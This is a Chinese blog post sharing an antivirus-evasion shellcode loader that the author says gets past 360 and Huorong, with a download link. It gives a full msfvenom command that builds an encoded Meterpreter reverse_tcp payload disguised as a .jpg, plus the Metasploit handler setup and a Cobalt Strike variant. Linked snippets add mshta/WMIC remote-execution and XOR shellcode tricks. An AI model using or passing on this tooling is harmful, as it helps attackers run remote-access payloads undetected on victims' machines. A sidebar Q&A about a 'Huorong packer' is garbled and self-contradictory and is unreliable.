【工具分享】免杀360&火绒的shellcode加载器

最新推荐文章于 2024-06-11 14:17:34 发布
最新推荐文章于 2024-06-11 14:17:34 发布
阅读量1.8k 收藏 9
点赞数
分类专栏: 工具 免杀和bypass 文章标签: 安全 免杀 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/122595137
版权

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

1. 免杀效果

shellcode加载器目前可以过360&火绒Windows Defender没戏。。。

代码和思路暂不开源!

你可以在我的GitHub上下载该工具:https://github.com/crow821/crowsec/tree/master/BypassAV_360_huornog

如果你访问GitHub困难,你可以在乌鸦安全公众号后台直接回复关键字:加载器 下载!

使用方法:

生成msfcsshellcode原生格式,命名为crowsec.jpg(这个是写死的),将其和crowsec_shelllcodeBypass.exe(这个名字可以修改的)放在一个目录下,直接双击即可!

1.1 当前免杀能力

1.2 半年前免杀能力

这个数据已没有意义。

这个shellcode加载器工具是我在2021-06-21号做的,优化之后VT查杀为0/68,一个月之后我再去检查,甚至到现在去检查,当前的VT查杀依旧为0/68

2021-06-21是能过火绒360Windows Defender(关闭自动发送可疑样本)

前几天在测试的时候,发现过不了Windows Defender,今天稍微优化了一下,发现还是过不了Windows Defender,主要原因是识别了msf的部分特征!!!

鉴于目前已经有了其他的免杀方案,所以在这里就把工具分享出来(🐶),至少还能过360火绒。(放出来之后,基本上几小时就没用了,所以仅供参考!)。

 

查询时间:2022.01.19

 

3. 使用方法

3.1. msf上线

在这里使用msfvenon生成shellcode,为了好点的效果,这里使用shikata_ga_nai 编码器器对shellcode进行混淆编码,编码之后的shellcode并不是所有杀软都识别不出来,详情可以看我以前的文章: 

老树开新花之shellcode_launcher免杀Windows Defender

 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b '\x00'  lhost=10.211.55.2 lport=1234  -f raw -o crowsec.jpg

 

使用msf进行监听:

  

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:1234

3.1.1 360

i

3.1.2 Windows Defender

被杀

 

3.1.3 火绒

 

3.2 Cobalt Strike上线

在这里只说思路,能够过火绒360,但是不能过Windows Defender,同样的问题:特征出现在shellcode上面。

 

 

将文件保存为crowsec.jpg(下图是一个示例,主要是太累了,不想换了。。。)

image.png

现将生成的bin文件修改为png文件,然后双击上线操作

 

但是这里可以发现,当前的payload已经被标记特征,直接被杀,但是免杀360火绒是不影响的。

往期推荐

老树开新花之shellcode_launcher免杀Windows Defender

自写go加载器加壳免杀——过国内主流杀软

PowerShell随机免杀结合ps2exe上线

pyinstaller打包exe免杀和逆向浅析

upx加壳过360

go加壳分离免杀过国内主流杀软

[文末抽奖] 免杀:GO实现shellcode加载器过360

pyinstaller打包逆向分析,顺便免杀Windows Defender

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

乌鸦安全
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
【护网必备】Windows平台shellcode免杀加载
Fly_鹏程万里
06-14 279
bypass:McAfee、金山(数字签名)、火绒、ESET、卡巴企业版(时间5s 抖动50 Sleep_mask)、360全家桶(物理机)、Norton(加白程序资源)、WDF(PC)、WDF(Server)、Symantec(加白程序资源)bypass:金山(数字签名)、火绒、ESET、360全家桶(物理机)、WDF(PC)、WDF(服务提示复查(关云保护))、McAfee、Norton(加白程序资源)、卡巴企业版(时间5s 抖动50 Sleep_mask)必须使用Bof操作,shell运行就掉线。
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载&加密工具
lza20001103的博客
09-04 2448
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载&加密工具 文章目录ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载&加密工具一、声明二、测试环境三、生成Msf_Payload四、生成CobaltStrike_Payload五、加密Payload六、配置ShellCode加载七、打包可执行程序(EXE编译环境)八、上线测试 ShellCode_Loader - Msf&amp
shellcode免杀
weixin_43526443的博客
07-14 1884
0x06利用wmic远程文件不落地执行shellcode 1、msf生成的hta链接放入hta.xsl文件中,(其中JScript调用mshta运行恶意hta),并将文件放置攻击方服务 <?xml version='1.0'?> <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" ..
免杀工具】Windows通用免杀shellcode加载
最新发布
Fly_鹏程万里
06-11 706
工具ShellQMaker.exe和加载模板文件(loading.exe)组成。ShellQMaker.exe将不同的shellcode写入加载的模板文件(loading.exe)中,生成不同的可执行文件。运行环境:加载模板通过QT实现使用C++开发,并由VS2022静态编译,目前只有一种加载模式,其他加载模式正在开发中。使用方法:使用vs2022打开项目解决方案(.sln),然后进行编译即可,当然你也可以从。ShellQMaker (你的shellcode) (生成的可执行文件)
evilhiding:一款好用的shellcode免杀工具
记录学习,一起进步
10-20 535
evilhiding:一款好用的shellcode免杀工具
免杀方法(三)msf加载免杀
qq_56426046的博客
10-03 1042
编辑i686-w64-mingw32-gcc main.c -o mm.exe-lws2_32。Metasploit还有编码模块(Encoders),生成后门前,对其进行编码转换,可以混。metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,Framework(MSF)在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试。在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且。
2023最新使用python进行shellcode免杀360火绒 ,反虚拟机
weixin_47111262的博客
03-20 1055
本源码仅供学习交流,不得用于违法范围,本源码已放到QQ交流群 群文件中QQ群:798134185。反虚拟机方案根据虚拟机系统文件 cpu核心数 开机启动时间 c盘大小判断。将加密的shellcode复制到shell.py中进行替换。生成c语言的payload使用encode.py进行加密。修改main.py的IP地址为c2服务地址。使用pyinstaller进行打包。bypass火绒 360。python版本3.11。2023最新免杀
免杀】异或加密Shellcode免杀绕过火绒360
z2560088的博客
03-19 2274
msfvenom生成c格式的shellcode 对该shellcode进行异或加密 #include<string> #include <iostream> using namespace std; using std::string; unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x0f\xb7.
红队培训班作业 | 免杀360火绒 四种方法大对比
Ms08067安全实验室
08-16 2930
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
shellcode加载用于加密shellcode的py小玩意
10-03
"shellcode加载"是一种工具,其目的是将shellcode注入到目标进程中,以便在运行时执行。本话题涉及的"shellcode加载用于加密shellcode的py小玩意"是一个Python程序,设计用于加密shellcode,增加其隐蔽性,并...
免杀对抗-java语言-shellcode免杀-源码修改+打包exe
xiaoheizi的博客
09-21 1098
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui,将生成的msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测。命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .
免杀加密加壳工具
09-13
免杀必不可少的工具。自己用的,放出来了!
绕过AV:免杀shellcode加载
03-04
旁路AV 条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
万能加壳免杀工具
04-02
实现多种加壳免杀,支持EXE ,DLL 类文件的加壳,压缩自身体积
360云查杀工具(免杀工具)
03-14
360云查杀工具 点击后自动隐藏 有可能被杀软防火墙误报病毒木马 请关闭杀软防火墙后重试 给大家分享下 密码 123
易语言一键过免杀,过360. (加壳)
10-21
Esprotect3.9.exe 易语言一键过免杀,过360. (加壳)
红队武库--在线Shellcode免杀平台(2020年老文)
J0o1ey Blog
10-04 2926
和几位dalao忙了几天 利用PHP+Python+GO三门语言写了一个在线shellcode免杀平台 在CS中生成X64的c shellcode,按照平台指定格式提交,即可一键生成免杀exe后门(过所有国产) 本人郑重承诺,不含任何后门!因为代码写的太烂,就不开源出来了 我也不会收集大佬们的c2 ip,今年hw我并不参加 本在线平台仅限攻防演练、授权渗透测试中使用,严禁用于非法用途(居心叵测之人自重,本系统带有溯源机制) 使用注册码进行账号注册后,会自动获取最近两次登录的ip并进行绑定,其他ip无法登
shellCode免杀技巧
qq_39330735的博客
05-15 2535
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
免杀之浅谈shellcode加载
qq_46217803的博客
12-26 1792
VirtualAlloc:申请一个虚拟地址的空间,可以说为虚拟空间到物理空间的映射,简单来说,在虚拟空间操作,物理空间就会自动的分配物理地址。可以直接在内存中运行,不需要一个完整的pe结构,简单来说,内存能执行就能运行,没有啥依赖的“生存环境”设置一个指针类型的,也可以是别的,这里设置成NULL,这样系统会自动的去分配一个空间区域。就是一个类型属性,主要是内存分配的类型属性,可以去百度的,这里设置了两个值,去了解一下。还是以上的shellcode,本地生成的,用的是Visual Studio。
exe免杀加壳工具火绒
06-21
### 回答1: 火绒免杀加壳工具包是一款能够让程序避开杀毒软件检测的软件开发工具。该工具包可以让用户通过一系列的操作,将编写好的程序进行加密和壳化处理。 火绒免杀加壳工具包具备了多种加密和保护功能,其中包括域名加密、资源加密、指令混淆、调试保护等。通过这些功能,用户可以有效的避免杀毒软件对程序的检测和拦截。 火绒免杀加壳工具包的操作简单直观,即使是初学者也可以轻松上手。用户只需要将编写好的程序上传到工具包中,然后根据需要进行选择加密和保护功能的操作,最后点击“加壳”按钮即可完成加壳处理。 在网络安全越来越重要的今天,火绒免杀加壳工具包对于保护程序的安全性有着重要的作用。同时,该工具包的出现也提醒我们,只有真正的了解和掌握技术才能应对不断变化的网络安全环境,才能更好地保护自己的网络安全和信息安全。 ### 回答2: 火绒是一款国内知名的免费杀毒软件,同时还提供了exe免杀加壳工具包。这个工具包的作用是对exe程序进行加壳,以此来防止病毒和恶意软件的检测和识别。 火绒的exe免杀加壳工具包具有以下特点: 1. 简单易用:该工具包的操作方法简单明了,任何人都可以快速上手,即使没有编程经验也可以轻松使用。 2. 安全可靠:火绒工具包使用先进的加密技术,保证了加壳后的程序能够更好地隐藏自己,并且不会被杀软和病毒检测出来。 3. 兼容性强:火绒工具包不仅支持32位和64位的Windows系统,还支持多种编程语言,包括C++、C#、Delphi、VB等。 4. 灵活性高:火绒工具包具有多种加壳选项,使用者可以根据需要选择不同的加壳方式,达到更好的防御效果。 总之,火绒的exe免杀加壳工具包是一款非常实用的工具,它能够帮助开发者和安全专家更好地保护自己的软件和系统免受恶意攻击。同时,由于火绒的声誉和安全性备受信任,该工具包的使用也更加放心和可靠。 ### 回答3: 火绒是一种exe免杀加壳工具包。它的作用是将原始的可执行文件进行加密处理,增加可执行文件在被检测时的混淆性和难度,以避免被杀软检测出来并绕过杀软的防御,使恶意程序可以成功运行。 火绒可以通过对加密算法进行优化,对代码进行混淆等方式,使加壳后的代码在被杀软检测时更加难以被识别。同时,火绒还可以免费提供远程免杀服务,帮助使用者避开杀软检测。 然而,使用火绒进行加壳并不意味着可以逃避所有安全防御。越来越多的杀软和安全产品正在开发新的技术和方法来解决加壳程序的问题。此外,使用加壳程序也有可能会对合法软件造成误判,影响正常的使用。因此,使用火绒或其他加壳工具包时,应该在进行必要的检测和测试后再使用,以免给系统安全和使用造成不必要的影响。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值